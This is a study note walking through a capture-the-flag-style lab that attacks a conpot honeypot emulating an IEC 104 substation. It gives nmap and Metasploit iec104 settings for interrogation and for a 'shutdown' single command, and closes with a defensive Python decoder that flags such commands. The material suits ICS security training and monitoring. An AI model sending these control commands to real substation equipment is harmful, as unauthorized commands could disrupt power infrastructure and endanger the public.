10-pentesting_an_infrastructure_substation
Note imported from Inbox during bulk consolidation.
Pentesting an Infrastructure Substation using 104
Mostly, the process, methods and commands are similar if not identical to those covered in the previous section. From here on we only introduce new material and just mention previously covered material [p] in Pentest Platform.
Red Team Challenge
INSTRUCTION: Perform a pentest on an infrastructure substation - shut down the IEC104 substation device
Config
Start conpot with conpot -f --template IEC104
Find host and ports
Use netdiscover and nmap port scanning.
We find port 2404 in use.
NMAP NSE
Search for nmap scripts related to IEC.
Run find /usr/share/nmap/ -name '*iec*.nse' to search for nmap IEC scripts (quote the glob so the shell does not expand it). Note that iec is in lowercase.
We find the IEC script called "iec-identify.nse".
Run sudo nmap 10.1.0.11 -Pn -p 2404 --script iec-identify.nse to use the IEC Nmap script.
We confirm port 2404 is open, and also that the IEC ASDU address is 7720.
Metasploit
Searching for IEC yields the IEC104 client module; use it.
IEC104 - Interrogation Command (Enumeration)
Set the following in msf -> iec104:
- RHOSTS =
- ASDU_ADDRESS = 7720
- COMMAND_TYPE = 100 (This is the interrogation command)
setg VERBOSE true -> gives detailed output
Now type run and press Enter.
Interrogation successful.
IEC104 - Shutdown Command
Amend in msf -> iec104:
- COMMAND_ADDRESS = 3348
- COMMAND_TYPE = 45 (This is the shutdown command)
- COMMAND_VALUE = 0x00
Now type run and press Enter.
The result IOA: 3348 DIQ: 0x00 shows that command address 3348 now holds the value 0x00, which confirms the shutdown command.
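From the defender's side, the interrogation (type 100) and single command (type 45) ASDUs sent above are exactly what a substation monitor should alert on when they come from anything other than the SCADA master. The decoder below is an added example, not code from these notes or from conpot/Metasploit; the helper names are mine and the sample frames are constructed to match the lab values (common address 7720, IOA 3348).

```python
# Added IEC 60870-5-104 APDU decoder for detecting control-direction commands
# (hypothetical helper names; sample frames constructed to match the lab values).
import struct
from typing import Optional

START, APCI_LEN = 0x68, 6
CONTROL_TYPES = {45: "C_SC_NA_1 single command", 46: "C_DC_NA_1 double command",
                 100: "C_IC_NA_1 interrogation"}
COT_NAMES = {6: "act", 7: "actcon", 10: "actterm", 20: "inrogen"}

def parse_apdu(buf: bytes) -> dict:
    """Decode one APDU into a dict; raise ValueError on malformed input."""
    if len(buf) < APCI_LEN or buf[0] != START:
        raise ValueError("not an IEC 104 APDU")
    if buf[1] != len(buf) - 2:              # length byte counts all bytes after it
        raise ValueError("APCI length mismatch")
    ctrl = buf[2:6]
    if ctrl[0] & 0x01:                       # S- or U-format: no ASDU follows
        return {"format": "U" if ctrl[0] & 0x02 else "S", "ctrl": ctrl.hex()}
    asdu = buf[6:]
    if len(asdu) < 9:                        # TypeID, VSQ, COT(2), CA(2), IOA(3)
        raise ValueError("ASDU too short")
    type_id, vsq, cot, _orig, ca = struct.unpack("<BBBBH", asdu[:6])
    info = {"format": "I", "type_id": type_id, "n_objects": vsq & 0x7F,
            "cot": cot & 0x3F, "negative": bool(cot & 0x40),
            "common_address": ca, "ioa": int.from_bytes(asdu[6:9], "little")}
    if type_id == 45 and len(asdu) >= 10:    # SCO: bit 0 = state, bit 7 = select
        info["state"] = "ON" if asdu[9] & 0x01 else "OFF"
        info["select"] = bool(asdu[9] & 0x80)
    return info

def alert_for(buf: bytes, trusted_master: bool) -> Optional[str]:
    """Alert text for a control ASDU from a peer that is not the SCADA master."""
    info = parse_apdu(buf)
    if trusted_master or info["format"] != "I" or info["type_id"] not in CONTROL_TYPES:
        return None
    cot = COT_NAMES.get(info["cot"], str(info["cot"]))
    extra = f" state={info['state']}" if "state" in info else ""
    return (f"{CONTROL_TYPES[info['type_id']]} cot={cot} "
            f"ca={info['common_address']} ioa={info['ioa']}{extra}")

# Constructed sample frames as they would appear in a capture of TCP port 2404.
STARTDT_ACT = bytes.fromhex("680407000000")                                  # U-frame
INTERROGATION = bytes.fromhex("680e00000000" "64010600281e" "000000" "14")  # type 100
SINGLE_CMD_OFF = bytes.fromhex("680e02000200" "2d010600281e" "140d00" "00")  # type 45

if __name__ == "__main__":
    for frame in (STARTDT_ACT, INTERROGATION, SINGLE_CMD_OFF):
        print(alert_for(frame, trusted_master=False))
```

Fed the frames from a capture of port 2404 (after TCP reassembly), the U-frame is ignored while both command ASDUs produce an alert unless the source is the known master.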